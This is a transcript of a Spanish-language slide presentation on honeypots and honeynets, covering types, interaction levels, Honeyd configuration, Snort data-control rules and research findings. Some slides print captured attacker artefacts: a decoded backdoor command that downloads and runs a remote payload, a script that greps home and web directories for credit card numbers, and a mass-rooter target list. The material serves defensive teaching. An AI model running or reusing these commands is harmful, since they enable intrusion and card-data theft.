La descarga está en progreso. Por favor, espere

La descarga está en progreso. Por favor, espere

Tarros de miel y redes trampa. El Ponente zConsultor de Seguridad en Germinus zMiembro del grupo HIS zDesarrollador de software libre yMiembro del proyecto.

Presentaciones similares


Presentación del tema: "Tarros de miel y redes trampa. El Ponente zConsultor de Seguridad en Germinus zMiembro del grupo HIS zDesarrollador de software libre yMiembro del proyecto."— Transcripción de la presentación:

1 Tarros de miel y redes trampa

2 El Ponente zConsultor de Seguridad en Germinus zMiembro del grupo HIS zDesarrollador de software libre yMiembro del proyecto Debian yAutor del Manual de Seguridad de Debian yDesarrollador principal de Tiger yColaborador en el desarrollo de Bastille y Nessus (entre otros)

3 Propósito Mostrar qué son los tarros de miel y las redes trampa, para qué sirven y qué aportan a la ingeniería de seguridad.

4 Resumen zEl problema zDefinición y tipos de los tarros de miel zIntroducción a las redes trampa zEjemplos de redes trampa zDescubrimientos zRecursos

5 El problema

6 zLas organizaciones son objetivos estáticos, no se mueve y todo el mundo sabe dónde están. zLos malos tienen la iniciativa. Tienen recursos ilimitados y pueden atacarte cuando quieran, como quieran.

7 Solución Tradicional zProteger su red lo mejor que pueda. zEsperar y desear que detecte cuando se produce un fallo.

8 Iniciativa Los tarros de miel y las redes trampa pueden dar la iniciativa.

9 Motivos e intenciones J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting

10 Descubrimiento de nuevas herramientas

11 Definición de los tarros de miel (o PED)

12 Historia z1990 yThe Cuckoos Egg yUna noche con Berferd z Deception Toolkit z NetFacade y CyberCop Sting z El proyecto Honeynet z Capturas de gusanos

13 Definición Recursos de seguridad cuyo valor reside en ser sondeados, atacados o comprometidos.

14 Concepto zRecursos que no tienen servicios en producción ni uso autorizado. zLo más probable es que cualquier conexión sea una sonda o un ataque, cualquier uso es no autorizado.

15 Una herramienta, no una solución zLos tarros de miel son muy flexibles, son de muchas formas y tamaños. zNo se diseñan para un problema específico. zPuede utilizarse para distintos propósitos.

16 Ventajas zInformación valiosa zNúmero reducido de falsos positivos zNúmero reducido de falsos negativos zConcepto simple zNo exige muchos recursos zRetorno de la inversión

17 Desventajas zRiesgo zPunto de vista limitado zNo protege sistemas vulnerables

18 Tipos de tarros de miel zProducción yIncrementa la seguridad en su red: protección, detección y respuesta zInvestigación yUtilizada para recoger información yAlerta temprana y predicción de ataques

19 Nivel de interacción zLos objetivos de los tarros de miel son distintos. zLa funcionalidad depende de sus objetivos. Cuanto más pueda hacer un atacante en un tarro de miel, mayor es el nivel de interacción.

20 Nivel de interacción. zA mayor interacción más se puede conocer sobre el atacante. zCuanto mayor la interacción, mayor el riesgo. zLos tarros de miel de producción suelen tener baja interacción mientras que las de investigación tienen alta interacción.

21 Niveles zBajo – Emula servicios. Ejemplos: BackOfficer Friendly o Honeyd. zMedio – Acceso limitado a un sistema operativo controlado. Ejemplo: entorno chroot o de jaula. zAlto – Acceso a un sistema operativo totalmente funcional. Ejemplo: ManTrap o las redes trampa.

22 ¿Cual es mejor? ¡Ninguno! Tienen todas ventajas y desventajas. Depende en lo que se quiera conseguir.

23 Baja interacción zEmula vulnerabilidades: Un atacante está limitado a interactuar con los servicios que se ofrezcan, y el nivel de funcionalidad que se le de a éstos. yUtilizado fundamentalmente para detectar o confundir. yCaptura de información limitada.

24 Emulación de servidor de FTP case $incmd_nocase in QUIT* ) echo -e "221 Goodbye.\r" exit 0;; SYST* ) echo -e "215 UNIX Type: L8\r" ;; HELP* ) echo -e "214-The following commands are recognized (* =>'s unimplemented).\r" echo -e " USER PORT STOR MSAM* RNTO NLST MKD CDUP\r" echo -e " PASS PASV APPE MRSQ* ABOR SITE XMKD XCUP\r" echo -e " ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOU\r" echo -e " SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZE\r" echo -e " REIN* MODE MSND* REST XCWD HELP PWD MDTM\r" echo -e " QUIT RETR MSOM* RNFR LIST NOOP XPWD\r" echo -e "214 Direct comments to ;; USER* ) parm1_nocase=`echo $parm1 | gawk '{print toupper($0);}'` if [ "$parm1_nocase" == "ANONYMOUS" ] then echo -e "331 Guest login ok, send your complete address as a password.\r" AUTH="ANONYMOUS" else echo -e "331 Password required for $parm1\r" AUTH=$parm1 fi ;;

25 Alta interacción zOfrece un sistema operativo completo para que el atacante interactúe con él. yUsado principalmente para investigación y respuesta, pero también puede ser utilizado para prevención y detección. yComplejas de desplegar, pero potencialmente más seguro que las jaulas yCaptura gran cantidad de información. yNO emula

26 Valor de redes trampa de producción zProtección zDetección zRespuesta

27 Valor de redes trampa de investigación zRecogida de inteligencia zPredicción y Alerta Temprana

28 Ejemplos

29 Redes Trampa de producción zBackOfficer Friendly zLaBrea Tarpit zDeception Toolkit zSmoke Detector zSpecter zHoneyd

30 Specter

31 Honeyd.conf create default set default personality "FreeBSD STABLE" set default default tcp action reset add default tcp port 80 "sh /etc/Honeyd/scripts/web.sh" add default tcp port 22 "sh /etc/Honeyd/scripts/test.sh" add default tcp port 113 open add default tcp port 1 reset create windows set windows personality "Windows NT 4.0 Server SP5-SP6" set windows default tcp action reset add windows tcp port 80 perl /etc/Honeyd/scripts/iis/main.pl" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23 add windows tcp port 22 proxy $ipsrc:22 set windows uptime bind windows

32 Nmap.prints # Contributed by Vilius Fingerprint Windows NT 4.0 Server SP5-SP6 TSeq(Class=RI%gcd= 2CA4) T1(DF=Y%W=2017%ACK=S++%Flags=AS%Ops=MNWNNT) T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T3(Resp=Y%DF=Y%W=2017%ACK=O%Flags=A%Ops=NNT) T4(DF=N%W=0%ACK=O%Flags=R%Ops=) T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=) T6(DF=N%W=0%ACK=O%Flags=R%Ops=) T7(DF=N%W=0%ACK=S++%Flags=AR%Ops=) PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN= 134%DAT=E)

33 ¿Un router Cisco?

34 Tarros de miel de investigación zManTrap zRedes trampa

35 ManTrap Sistema Operativo Host Jaula 1Jaula 2Jaula 3Jaula 4

36 Repetición de sesión

37 Red Trampa (Honeynet) zTarro de miel OpenSource. zSe trata de una arquitectura, no es ni un producto ni ningún software concreto. zPoblada de sistemas vivos.

38 GenII Honeynet

39 Control de Datos - GenII alert tcp $HONEYNET any -> any 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)

40 Redes trampas virtuales

41 Desplegando tarros de miel

42 Tarros de miel distribuidos

43 Tarros de miel wireless

44 Descubrimientos

45 El proyecto Honeynet zUna organización de voluntarios dedicados a la investigación de riesgos cibernéticos. zDesplegando redes a lo largo del planeta para que sean atacadas

46 ¿Quién soy yo?

47

48 TESO wu-ftpd mass- Mass-rooter 1 | Caldera eDesktop|OpenLinux 2.3 update[wu-ftpd OL.i386.rpm] 2 | Debian potato [wu-ftpd_ deb] 3 | Debian potato [wu-ftpd_ deb] 4 | Debian potato [wu-ftpd_ deb] 5 | Debian sid [wu-ftpd_ _i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd _StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd _imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd x.i386.rpm] 14 | RedHat 6.? [wu-ftpd i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd i386.rpm] 22 | SuSE 6.0|6.1 update wu [wuftpd i386.rpm] 23 | SuSE 6.2 update [wu-ftpd i386.rpm] 24 | SuSE 6.2 update [wuftpd i386.rpm] 25 | SuSE 6.2 update wu [wuftpd i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu [wuftpd.rpm]

49 02/19-04:34: > PROTO011 TTL:237 TOS:0x0 ID:13784 IpLen:20 DgmLen: B7 37 BA 3D B5 38 BB F BD = H D3 5D D9 62 EF 6B A2 F4 2B AE 3E C CD 57.].b.k..+.>.R..W DD 69 F2 6C E8 1F 8E 29 B4 3B 8C D A9 F6.i.l...).;...a.. 3B 84 CF 18 5D A5 EC 36 7B C B3 02 4B 91 ;...]..6{..d..K. 0E 94 1A 51 A6 DD 23 AE 32 B8 FF 7C CD 58...Q..#.2..|...X D6 67 9E F0 27 A1 1C A8 2F 66 B8 EF 7A.g..'..S.$./f..z F2 7B B2 F A D4 5A E0 25 B0 2E BF.{..... W.Z.%... F6 48 7F C4 0A AA 26 AF 3C B8 EF H.....&.<..Ax. 85 BC D BA 40 C6 0B A5 DC 67 7C F8 81 0E 8A DC F3 0A F 66 7D 94 AB C2 | !8Of}... D9 F0 07 1E 35 4C 63 7A 91 A8 BF D6 ED 04 1B Lcz E A5 BC D3 EA F 46 5D 74 8B A2 I`w /F]t.. B9 D0 E7 FE 15 2C 43 5A F B6 CD E4 FB ,CZq E 85 9C B3 CA E1 F8 0F 26 3D 54 6B B0 C7 DE F5 0C 23 3A F 96 AD C4 DB F #:Qh E 65 7C 93 AA C1 D8 EF 06 1D 34 4B 62. 7Ne| Kb A7 BE D5 EC 03 1A F 76 8D A4 BB D2 y H_v.... E E 45 5C 73 8A A1 B8 CF E6 FD 14 2B E\s B E B5 CC E3 FA F 56 6D 84 9B B2 Yp (?Vm... C9 E0 F7 0E 25 3C 53 6A AF C6 DD F4 0B %Ul $;R i. Nuevas tácticas - puertas traseras

50 starting decode of packet size B7 37 BA 3D B5 38 BB F BD 48 D3 5D local buf of size B 69 6C 6C 61 6C 6C 20 2D killall -9 tts B 20 6C 79 6E D 73 6F 75 erve ; lynx -sou A 2F 2F E 31 rce E E 32 3A F 66 6F :8882/fo 6F 20 3E 20 2F 74 6D 70 2F 66 6F 6F 2E A o > /tmp/foo.tgz 20 3B F 74 6D B ; cd /tmp ; tar 20 2D A F 6F 2E A 20 3B -xvzf foo.tgz ; 20 2E 2F B D 20./ttserve ; rm 2D F 6F 2E A rf foo.tgz ttse B rve; B A A B1 BF E7 6F BF 1D 88 CB....j.9....o.... C5 FE $ Orden descifrada de la puerta trasera

51 Motivos #!/bin/sh echo " Caut carti de credit si incerc sa salvez in card.log" touch /dev/ida/.inet/card.log egrep -ir 'mastercard|visa' /home|egrep -v cache >>card.log egrep -ir 'mastercard|visa' /var|egrep -v cache >>card.log egrep -ir 'mastercard|visa' /root|egrep -v cache >>card.log if [ -d /www ]; then egrep -ir 'mastercard|visa' /www >>card.log fi

52 Predicción y alerta temprana

53 Resumen zLos tarros de miel y las redes trampa son un elemento de investigación interesante zNo sirven para proteger sistemas inseguros zPero son un nuevo elemento que ayuda a la investigación de problemas de seguridad y detección de ataques

54 Fuentes - Libros z Know Your Enemy yhttp://www.honeynet.org/book/ zHoneypots: Tracking Hackers yhttp://www.tracking-hackers.com/book/

55 Fuentes - Sitios Web zhttp://www.tracking-hackers.com zhttp://www.honeynet.org zhttp://his.sourceforge.net zhttp://www.nfr.net/products/bof zhttp://www.citi.umich.edu/u/provos/honeyd/ zhttp://www.all.net/dtk zhttp://www.specter.com zhttp://www.mantrap.com

56 Fuentes - Publicaciones zHoneypots: Definitions and Values yhttp://www.spitzner.net/honeypots.html zHoneynets yhttp://www.honeynet.org/papers/honeynet/ zVirtual Honeynets yhttp://www.honeynet.org/papers/virtual/http://www.honeynet.org/papers/virtual/ Muchos traducidos en

57 Recursos - Listas de correo zLista de correo de tarros de miel yhttp://www.securityfocus.com/popups/forums/honeypots/faq.shtml zLista de correo Firewall Wizards yhttp://www.nfr.net/mailman/listinfo/firewall-wizards zLista de correo proyecto HIS (en español) yhttps://lists.sourceforge.net/lists/listinfo/his-discusion

58 Contacto

59 ¿?


Descargar ppt "Tarros de miel y redes trampa. El Ponente zConsultor de Seguridad en Germinus zMiembro del grupo HIS zDesarrollador de software libre yMiembro del proyecto."

Presentaciones similares


Anuncios Google